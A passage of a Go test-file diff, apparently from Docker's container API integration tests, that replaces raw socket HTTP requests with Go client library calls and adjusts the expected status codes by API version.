http.StatusNoContent) + defer cli.Close() + + err = cli.ContainerRestart(context.Background(), name, nil) + c.Assert(err, checker.IsNil) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) } func (s *DockerSuite) TestContainerAPIStart(c *check.C) { name := "testing-start" - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), - "OpenStdin": true, + config := containertypes.Config{ + Image: "busybox", + Cmd: append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + OpenStdin: true, } - status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = 
cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) // second call to start should give 304 - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + // maybe add ContainerStartWithRaw to test it + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) // TODO(tibor): figure out why this doesn't work on windows - if isLocalDaemon { - c.Assert(status, checker.Equals, http.StatusNotModified) - } } func (s *DockerSuite) TestContainerAPIStop(c *check.C) { name := "test-api-stop" runSleepingContainer(c, "-i", "--name", name) + timeout := 30 * time.Second + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + err = cli.ContainerStop(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) // second call to start should give 304 - status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + // maybe add ContainerStartWithRaw to test it + err = cli.ContainerStop(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotModified) } func (s *DockerSuite) TestContainerAPIWait(c *check.C) { name := "test-api-wait" sleepCmd := "/bin/sleep" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { sleepCmd = "sleep" } dockerCmd(c, "run", "--name", name, 
"busybox", sleepCmd, "2") - status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + defer cli.Close() + + waitresC, errC := cli.ContainerWait(context.Background(), name, "") - var waitres containertypes.ContainerWaitOKBody - c.Assert(json.Unmarshal(body, &waitres), checker.IsNil) - c.Assert(waitres.StatusCode, checker.Equals, int64(0)) + select { + case err = <-errC: + c.Assert(err, checker.IsNil) + case waitres := <-waitresC: + c.Assert(waitres.StatusCode, checker.Equals, int64(0)) + } } func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { @@ -985,10 +1074,10 @@ func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { postData := types.CopyConfig{ Resource: "/test.txt", } - - status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData) + // no copy in client/ + res, _, err := request.Post("/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) } func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { @@ -1000,12 +1089,12 @@ func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { Resource: "/test.txt", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) found := false - for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + for tarReader := tar.NewReader(body); ; { h, err := tarReader.Next() if err != nil { if err == io.EOF { @@ -1021,7 +1110,7 @@ func (s 
*DockerSuite) TestContainerAPICopyPre124(c *check.C) { c.Assert(found, checker.True) } -func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { +func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPre124(c *check.C) { testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later name := "test-container-api-copy-resource-empty" dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") @@ -1030,10 +1119,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { Resource: "", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Matches, "Path cannot be empty\n") + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } + b, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Matches, "Path cannot be empty\n") } func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) { @@ -1045,10 +1140,16 @@ func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) Resource: "/notexist", } - status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + res, body, err := request.Post("/v1.23/containers/"+name+"/copy", request.JSONBody(postData)) + c.Assert(err, checker.IsNil) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, 
checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n") + c.Assert(string(b), checker.Matches, "Could not find the file /notexist in container "+name+"\n") } func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { @@ -1057,40 +1158,51 @@ func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { Resource: "/something", } - status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData) + res, _, err := request.Post("/v1.23/containers/notexists/copy", request.JSONBody(postData)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) } func (s *DockerSuite) TestContainerAPIDelete(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) dockerCmd(c, "stop", id) - status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) } func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) { - status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) - c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist") + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "doesnotexist", types.ContainerRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such container: doesnotexist") } func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) { - out, _ := runSleepingContainer(c) - + 
out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil) + removeOptions := types.ContainerRemoveOptions{ + Force: true, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, removeOptions) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) } func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) { @@ -1109,34 +1221,45 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) { links := inspectFieldJSON(c, id2, "HostConfig.Links") c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers")) - status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil) + removeOptions := types.ContainerRemoveOptions{ + RemoveLinks: true, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "tlink2/tlink1", removeOptions) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b))) linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links") c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links")) } func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{}) + expected := "cannot remove 
a running container" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { testRequires(c, SameHostDaemon) vol := "/testvolume" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { vol = `c:\testvolume` } - out, _ := runSleepingContainer(c, "-v", vol) + out := runSleepingContainer(c, "-v", vol) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) @@ -1145,73 +1268,81 @@ func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { _, err = os.Stat(source) c.Assert(err, checker.IsNil) - status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil) + removeOptions := types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + } + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), id, removeOptions) + c.Assert(err, check.IsNil) + _, err = os.Stat(source) c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err)) } // Regression test for https://github.com/docker/docker/issues/6231 func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) { - conn, err := sockConn(time.Duration(10*time.Second), "") - c.Assert(err, checker.IsNil) - client := httputil.NewClientConn(conn, nil) - defer client.Close() config := map[string]interface{}{ "Image": "busybox", "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), "OpenStdin": true, } - b, err := json.Marshal(config) - c.Assert(err, checker.IsNil) - - req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b)) - c.Assert(err, checker.IsNil) - req.Header.Set("Content-Type", "application/json") - // This is a cheat to make the http request do chunked encoding - // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite - // 
https://golang.org/src/pkg/net/http/request.go?s=11980:12172 - req.ContentLength = -1 - resp, err := client.Do(req) + resp, _, err := request.Post("/containers/create", request.JSONBody(config), request.With(func(req *http.Request) error { + // This is a cheat to make the http request do chunked encoding + // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite + // https://golang.org/src/pkg/net/http/request.go?s=11980:12172 + req.ContentLength = -1 + return nil + })) c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding")) - resp.Body.Close() + defer resp.Body.Close() c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated) } func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) containerID := strings.TrimSpace(out) c.Assert(waitRun(containerID), checker.IsNil) - statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerStop(context.Background(), containerID, nil) c.Assert(err, checker.IsNil) - // 204 No Content is expected, not 200 - c.Assert(statusCode, checker.Equals, http.StatusNoContent) c.Assert(waitInspect(containerID, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) } // #14170 func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) { - config := struct { - Image string - Entrypoint string - Cmd []string - }{"busybox", "echo", []string{"hello", "world"}} - _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + config := containertypes.Config{ + Image: "busybox", + Entrypoint: []string{"echo"}, + Cmd: []string{"hello", "world"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, 
&containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest") c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "echotest") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") config2 := struct { Image string - Entrypoint []string + Entrypoint string Cmd []string - }{"busybox", []string{"echo"}, []string{"hello", "world"}} - _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + }{"busybox", "echo", []string{"hello", "world"}} + _, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2)) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, "start", "-a", "echotest2") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") @@ -1219,21 +1350,26 @@ func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *c // #14170 func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) { - config := struct { - Image string - Entrypoint string - Cmd string - }{"busybox", "echo", "hello world"} - _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"echo", "hello", "world"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "echotest") c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "echotest") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") config2 := struct { - Image string - Cmd []string - }{"busybox", []string{"echo", "hello", "world"}} - _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + Image string + Entrypoint string + Cmd string + }{"busybox", "echo", "hello world"} + _, _, err = request.Post("/containers/create?name=echotest2", request.JSONBody(config2)) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, 
"start", "-a", "echotest2") c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") @@ -1248,29 +1384,38 @@ func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *che CapAdd string CapDrop string }{"busybox", "NET_ADMIN", "SYS_ADMIN"} - status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config) + res, _, err := request.Post("/containers/create?name=capaddtest0", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - config2 := struct { - Image string - CapAdd []string - CapDrop []string - }{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, []string{"SETGID"}} - status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2) + config2 := containertypes.Config{ + Image: "busybox", + } + hostConfig := containertypes.HostConfig{ + CapAdd: []string{"NET_ADMIN", "SYS_ADMIN"}, + CapDrop: []string{"SETGID"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config2, &hostConfig, &networktypes.NetworkingConfig{}, "capaddtest1") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) } // #14915 func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) { testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later - config := struct { - Image string - }{"busybox"} - status, _, err := sockRequest("POST", "/v1.18/containers/create", config) + config := containertypes.Config{ + Image: "busybox", + } + + cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.18")) + c.Assert(err, checker.IsNil) + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) } // Ensure an 
error occurs when you have a container read-only rootfs but you @@ -1291,93 +1436,87 @@ func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs( readOnly: true, volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 }) - defer deleteContainer(cID) // Attempt to extract to a symlink in the volume which points to a // directory outside the volume. This should cause an error because the // rootfs is read-only. - query := make(url.Values, 1) - query.Set("path", "/vol2/symlinkToAbsDir") - urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode()) - - statusCode, body, err := sockRequest("PUT", urlPath, nil) + var httpClient *http.Client + cli, err := client.NewClient(daemonHost(), "v1.20", httpClient, map[string]string{}) c.Assert(err, checker.IsNil) - if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) { - c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body)) - } -} - -func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) { - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(string(body), checker.Equals, "[]\n") + err = cli.CopyToContainer(context.Background(), cID, "/vol2/symlinkToAbsDir", nil, types.CopyToContainerOptions{}) + c.Assert(err.Error(), checker.Contains, "container rootfs is marked read-only") } func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) { // Not supported on Windows testRequires(c, DaemonIsLinux) - c1 := struct { - Image string - CpusetCpus string - }{"busybox", "1-42,,"} - name := "wrong-cpuset-cpus" - status, body, err := sockRequest("POST", "/containers/create?name="+name, c1) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + defer cli.Close() + + config := containertypes.Config{ + Image: "busybox", + } + 
hostConfig1 := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CpusetCpus: "1-42,,", + }, + } + name := "wrong-cpuset-cpus" + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig1, &networktypes.NetworkingConfig{}, name) expected := "Invalid value 1-42,, for cpuset cpus" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + c.Assert(err.Error(), checker.Contains, expected) - c2 := struct { - Image string - CpusetMems string - }{"busybox", "42-3,1--"} + hostConfig2 := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CpusetMems: "42-3,1--", + }, + } name = "wrong-cpuset-mems" - status, body, err = sockRequest("POST", "/containers/create?name="+name, c2) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig2, &networktypes.NetworkingConfig{}, name) expected = "Invalid value 42-3,1-- for cpuset mems" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{"ShmSize": -1}, + config := containertypes.Config{ + Image: "busybox", + } + hostConfig := containertypes.HostConfig{ + ShmSize: -1, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err.Error(), checker.Contains, "SHM 
size can not be less than 0") } func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) var defaultSHMSize int64 = 67108864 - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": "mount", + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize) @@ -1391,25 +1530,20 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check. 
func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{}, - "Cmd": "mount", + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864)) @@ -1423,25 +1557,24 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": "mount", - "HostConfig": map[string]interface{}{"ShmSize": 1073741824}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) + hostConfig := containertypes.HostConfig{ + ShmSize: 1073741824, + } - var container 
containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824)) @@ -1455,25 +1588,25 @@ func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) { // Swappiness is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, 
check.IsNil) - c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.31") { + c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) + } else { + c.Assert(containerJSON.HostConfig.MemorySwappiness, check.IsNil) + } } // check validation is done daemon side and not only in cli @@ -1481,42 +1614,43 @@ func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *che // OomScoreAdj is not supported on Windows testRequires(c, DaemonIsLinux) - config := struct { - Image string - OomScoreAdj int - }{"busybox", 1001} + config := containertypes.Config{ + Image: "busybox", + } + + hostConfig := containertypes.HostConfig{ + OomScoreAdj: 1001, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + name := "oomscoreadj-over" - status, b, err := sockRequest("POST", "/containers/create?name="+name, config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name) expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]" - msg := getErrorMessage(c, b) - if !strings.Contains(msg, expected) { - c.Fatalf("Expected output to contain %q, got %q", expected, msg) + c.Assert(err.Error(), checker.Contains, expected) + + hostConfig = containertypes.HostConfig{ + OomScoreAdj: -1001, } - config = struct { - Image string - OomScoreAdj int - }{"busybox", -1001} name = "oomscoreadj-low" - status, b, err = sockRequest("POST", "/containers/create?name="+name, config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]" - msg = getErrorMessage(c, b) - 
if !strings.Contains(msg, expected) { - c.Fatalf("Expected output to contain %q, got %q", expected, msg) - } + c.Assert(err.Error(), checker.Contains, expected) } // test case for #22210 where an empty container name caused panic. func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) { - status, out, err := sockRequest("DELETE", "/containers/", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - c.Assert(string(out), checker.Contains, "No container name or ID supplied") + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "", types.ContainerRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such container") } func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { @@ -1524,31 +1658,33 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { testRequires(c, DaemonIsLinux) name := "testing-network-disabled" - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"top"}, - "NetworkDisabled": true, + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"top"}, + NetworkDisabled: true, } - status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) c.Assert(waitRun(name), check.IsNil) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } bc := make(chan b, 1) go 
